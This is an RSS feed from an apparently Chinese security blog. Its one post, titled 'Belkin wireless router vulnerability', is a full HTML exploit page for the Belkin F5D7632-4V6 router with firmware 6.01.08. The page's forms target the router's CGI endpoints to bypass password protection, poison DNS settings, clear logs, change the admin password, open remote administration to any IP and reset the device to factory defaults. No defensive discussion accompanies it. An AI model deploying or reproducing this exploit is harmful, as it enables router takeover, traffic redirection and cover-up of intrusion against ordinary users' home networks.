<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Chinadu&#039;s Blog &#187; 贝尔金</title>
	<atom:link href="http://www.4shell.org/archives/tag/%e8%b4%9d%e5%b0%94%e9%87%91/feed" rel="self" type="application/rss+xml" />
	<link>http://www.4shell.org</link>
	<description>关注网络安全</description>
	<lastBuildDate>Fri, 10 Feb 2012 03:53:40 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.1</generator>
		<item>
		<title>贝尔金无线路由器漏洞</title>
		<link>http://www.4shell.org/archives/1488.html</link>
		<comments>http://www.4shell.org/archives/1488.html#comments</comments>
		<pubDate>Fri, 22 Jan 2010 02:31:10 +0000</pubDate>
		<dc:creator>Chinadu</dc:creator>
				<category><![CDATA[技术文章]]></category>
		<category><![CDATA[贝尔金]]></category>

		<guid isPermaLink="false">http://www.4shell.org/archives/1488.html</guid>
		<description><![CDATA[&#60;html&#62; &#60;head&#62; &#60;/head&#62; &#60;body&#62; &#60;b&#62;这个HTML代码可以绕过webinterface密码保护的贝尔金无线路由器+ADSL2调制解调器&#60;br&#62; 它的工作模式F5D7632-4V6与升级固件6.01.08&#60;/b&#62; &#60;br&#62; &#60;form action="http://192.168.2.1/cgi-bin/setup_dns.exe" name=dnspoison method=post&#62; 改变DNS域名服务器（IP可以不一样）&#60;br&#62; &#60;input name=page type=hidden value="setup_dns"&#62; &#60;input name=logout type=hidden value=""&#62; &#60;input name=auto_from_isp type=hidden value="0"&#62; &#60;input name=dns1_1 type=text value="1"&#62; &#60;input name=dns1_2 type=text value="2"&#62; &#60;input name=dns1_3 type=text value="3"&#62; &#60;input name=dns1_4 type=text value="4"&#62; &#60;br&#62; &#60;input name=dns2_1 type=text value="1"&#62; &#60;input name=dns2_2 type=text value="2"&#62; &#60;input name=dns2_3 type=text value="3"&#62; &#60;input name=dns2_4 [...]]]></description>
			<content:encoded><![CDATA[<blockquote><p>&lt;html&gt;</p>
<p>&lt;head&gt;</p>
<p>&lt;/head&gt;</p>
<p>&lt;body&gt;</p>
<p>&lt;b&gt;这个HTML代码可以绕过webinterface密码保护的贝尔金无线路由器+ADSL2调制解调器&lt;br&gt;</p>
<p>它的工作模式F5D7632-4V6与升级固件6.01.08&lt;/b&gt;</p>
<p>&lt;br&gt;</p>
<p>&lt;form action="http://192.168.2.1/cgi-bin/setup_dns.exe" name=dnspoison method=post&gt;</p>
<p>改变DNS域名服务器（IP可以不一样）&lt;br&gt;</p>
<p>&lt;input name=page type=hidden value="setup_dns"&gt;</p>
<p>&lt;input name=logout type=hidden value=""&gt;</p>
<p>&lt;input name=auto_from_isp type=hidden value="0"&gt;</p>
<p>&lt;input name=dns1_1 type=text value="1"&gt;</p>
<p>&lt;input name=dns1_2 type=text value="2"&gt;</p>
<p>&lt;input name=dns1_3 type=text value="3"&gt;</p>
<p>&lt;input name=dns1_4 type=text value="4"&gt;</p>
<p>&lt;br&gt;</p>
<p>&lt;input name=dns2_1 type=text value="1"&gt;</p>
<p>&lt;input name=dns2_2 type=text value="2"&gt;</p>
<p>&lt;input name=dns2_3 type=text value="3"&gt;</p>
<p>&lt;input name=dns2_4 type=text value="5"&gt;</p>
<p>&lt;br&gt;</p>
<p>&lt;input name=submit type=submit value="放毒"&gt;</p>
<p>&lt;/form&gt;</p>
<p>&lt;br&gt;</p>
<p>&lt;br&gt;</p>
<p>&lt;form action="http://192.168.2.1/cgi-bin/statusprocess.exe" name=clearlog method=post&gt;</p>
<p>清除日志文件&lt;br&gt;</p>
<p>&lt;input name=securityclear type=submit value="清除"&gt;</p>
<p>&lt;/form&gt;</p>
<p>&lt;br&gt;</p>
<p>&lt;br&gt;</p>
<p>&lt;form ACTION="http://192.168.2.1/cgi-bin/system_all.exe" method=post name=changepassword&gt;</p>
<p>改变时间、密码（如果您有旧的密码）、远程管理、UPnP&lt;br&gt;</p>
<p>和自动固件更新（美好的结合DNS中毒）&lt;br&gt;</p>
<p>&lt;input type="hidden" name="restart_time" value="0"&gt;</p>
<p>&lt;input type="hidden" name="reload" value="1"&gt;</p>
<p>&lt;input type="hidden" name="restart_page" value='document.location.href="system.stm";'&gt;</p>
<p>&lt;input type="hidden" name="location_page" value="system.stm"&gt;</p>
<p>&lt;input type="hidden" name="server1" value=""&gt;</p>
<p>&lt;input type="hidden" name="server2" value=""&gt;</p>
<p>&lt;!-- for clock --&gt;</p>
<p>&lt;input type="hidden" name="year" value=""&gt;</p>
<p>&lt;input type="hidden" name="mon" value=""&gt;</p>
<p>&lt;input type="hidden" name="day" value=""&gt;</p>
<p>&lt;input type="hidden" name="hour" value=""&gt;</p>
<p>&lt;input type="hidden" name="min" value=""&gt;</p>
<p>&lt;input type="hidden" name="sec" value=""&gt;</p>
<p>&lt;br&gt;旧密码&lt;br&gt;</p>
<p>&lt;input type="password" size="12" maxlength="12" name="userOldPswd" value=""&gt;</p>
<p>&lt;br&gt;新密码，两次&lt;br&gt;</p>
<p>&lt;input type="password" size="12" maxlength="12" name="userNewPswd" value=""&gt;</p>
<p>&lt;input type="password" size="12" maxlength="12" name="userConPswd" value=""&gt;</p>
<p>&lt;br&gt;登录超时（1-99分钟）&lt;br&gt;</p>
<p>&lt;input type="text" name="timeout" size="3" maxlength="3" value="10"&gt;</p>
<p>&lt;br&gt; 时间和时区：&lt;br&gt;</p>
<p>夏令： &lt;br&gt;</p>
<p>&lt;input type="checkbox" name="daylight" value="1"&gt;时区（号码）&lt;br&gt;</p>
<p>&lt;input type="text" name="time_zone" value="26"&gt;</p>
<p>&lt;input type="checkbox" name="enable_ntp" value="1"&gt;启用自动时间服务器维护&lt;br&gt;</p>
<p>&lt;tr&gt;</p>
<p>&lt;td width="240"&gt;主服务器&lt;/td&gt;</p>
<p>&lt;td width="360"&gt;</p>
<p>&lt;select name="time1"&gt;</p>
<p>&lt;option&gt;132.163.4.102  - North America&lt;/option&gt;</p>
<p>&lt;option&gt;192.5.41.41    - North America&lt;/option&gt;</p>
<p>&lt;option&gt;192.5.41.209   - North America&lt;/option&gt;</p>
<p>&lt;option&gt;207.200.81.113 - North America&lt;/option&gt;</p>
<p>&lt;option&gt;208.184.49.9   - North America&lt;/option&gt;</p>
<p>&lt;option&gt;129.132.2.21   - Europe&lt;/option&gt;</p>
<p>&lt;option&gt;130.149.17.8   - Europe&lt;/option&gt;</p>
<p>&lt;option&gt;128.250.36.3   - Australia&lt;/option&gt;</p>
<p>&lt;option&gt;137.189.8.174  - Asia Pacific&lt;/option&gt;</p>
<p>&lt;/select&gt;</p>
<p>&lt;/td&gt;</p>
<p>&lt;/tr&gt;</p>
<p>&lt;tr&gt;</p>
<p>&lt;td width="240"&gt;副服务器&lt;/td&gt;</p>
<p>&lt;td width="360"&gt;</p>
<p>&lt;select name="time2"&gt;</p>
<p>&lt;option&gt;132.163.4.102  - North America&lt;/option&gt;</p>
<p>&lt;option&gt;192.5.41.41    - North America&lt;/option&gt;</p>
<p>&lt;option&gt;192.5.41.209   - North America&lt;/option&gt;</p>
<p>&lt;option&gt;207.200.81.113 - North America&lt;/option&gt;</p>
<p>&lt;option&gt;208.184.49.9   - North America&lt;/option&gt;</p>
<p>&lt;option&gt;129.132.2.21   - Europe&lt;/option&gt;</p>
<p>&lt;option&gt;130.149.17.8   - Europe&lt;/option&gt;</p>
<p>&lt;option&gt;128.250.36.3   - Australia&lt;/option&gt;</p>
<p>&lt;option&gt;137.189.8.174  - Asia Pacific&lt;/option&gt;</p>
<p>&lt;/select&gt;</p>
<p>&lt;/td&gt;</p>
<p>&lt;/tr&gt;</p>
<p>&lt;br&gt;远程管理：&lt;br&gt;</p>
<p>&lt;input type="checkbox" name="allow_all" value="1"&gt;任何IP地址都可以远程管理路由器&lt;br&gt;</p>
<p>只有这个IP地址可以远程管理路由器&lt;br&gt;</p>
<p>&lt;input name="IP1" size="3" maxlength="3" value="0"&gt;.</p>
<p>&lt;input name="IP2" size="3" maxlength="3" value="0"&gt;.</p>
<p>&lt;input name="IP3" size="3" maxlength="3" value="0"&gt;.</p>
<p>&lt;input name="IP4" size="3" maxlength="3" value="0"&gt;</p>
<p>&lt;br&gt; 远程端口：</p>
<p>&lt;input name="REMOTEPORT" size="5" maxlength="5" value="0"&gt;</p>
<p>&lt;br&gt;NAT 授权：&lt;br&gt;</p>
<p>&lt;input type=radio name=Nat_enable value=1&gt;授权&lt;br&gt;</p>
<p>&lt;input type=radio name=Nat_enable value=0&gt;废除&lt;br&gt;</p>
<p>&lt;br&gt;UPnP&lt;br&gt;</p>
<p>&lt;input type="radio" name="upnp_enable" value=1&gt;授权&lt;br&gt;</p>
<p>&lt;input type=radio name=upnp_enable value=0&gt;废除&lt;br&gt;</p>
<p>&lt;br&gt;自动更新固件&lt;br&gt;</p>
<p>&lt;input type="radio" name="autoUpdate_enable" value=1&gt;授权&lt;br&gt;</p>
<p>&lt;input type="radio" name="autoUpdate_enable" value=0&gt;废除&lt;br&gt;</p>
<p>&lt;/form&gt;</p>
<p>&lt;form method="POST" action="http://192.168.2.1/cgi-bin/restore.exe" name="RebootForm"&gt;</p>
<p>&lt;br&gt;恢复出厂默认值（包括密码）&lt;br&gt;</p>
<p>&lt;input type="hidden" name="page" value="tools_restore"&gt;</p>
<p>&lt;input type="hidden" name="logout"&gt;</p>
<p>&lt;input type="submit" value="恢复默认值" style="{width:120px;}" class="submitBtn"&gt;</p>
<p>&lt;/form&gt;</p>
<p>&lt;/body&gt;</p>
<p>&lt;/html&gt;</p></blockquote>
<h2  class="related_post_title">随机日志</h2><ul class="related_post"><li>2009年05月18日 -- <a href="http://www.4shell.org/archives/783.html" title="做站要成功 创新是关键">做站要成功 创新是关键</a></li><li>2010年06月10日 -- <a href="http://www.4shell.org/archives/1777.html" title="你还敢执行txt文件吗？Windows 0day ">你还敢执行txt文件吗？Windows 0day </a></li><li>2009年07月21日 -- <a href="http://www.4shell.org/archives/922.html" title="漫谈安全产品与安全服务">漫谈安全产品与安全服务</a></li><li>2009年07月6日 -- <a href="http://www.4shell.org/archives/819.html" title="五十三种木马启动方式">五十三种木马启动方式</a></li><li>2008年11月13日 -- <a href="http://www.4shell.org/archives/587.html" title="VMware虚拟机启动WIFIWAY">VMware虚拟机启动WIFIWAY</a></li><li>2009年03月8日 -- <a href="http://www.4shell.org/archives/759.html" title="惩戒+戒律牧22 80场冲肩膀心得与体会">惩戒+戒律牧22 80场冲肩膀心得与体会</a></li><li>2009年12月6日 -- <a href="http://www.4shell.org/archives/1317.html" title="思科交换机密码破解">思科交换机密码破解</a></li><li>2009年07月28日 -- <a href="http://www.4shell.org/archives/971.html" title="自由软件之父:为了自由，不使用GOOGLE SAAS产品">自由软件之父:为了自由，不使用GOOGLE SAAS产品</a></li><li>2008年11月6日 -- <a href="http://www.4shell.org/archives/554.html" title="安全专家详谈Web威胁种类及其防御方法">安全专家详谈Web威胁种类及其防御方法</a></li><li>2007年04月2日 -- <a href="http://www.4shell.org/archives/171.html" title="Win32 download url shellcode">Win32 download url shellcode</a></li></ul>]]></content:encoded>
			<wfw:commentRss>http://www.4shell.org/archives/1488.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

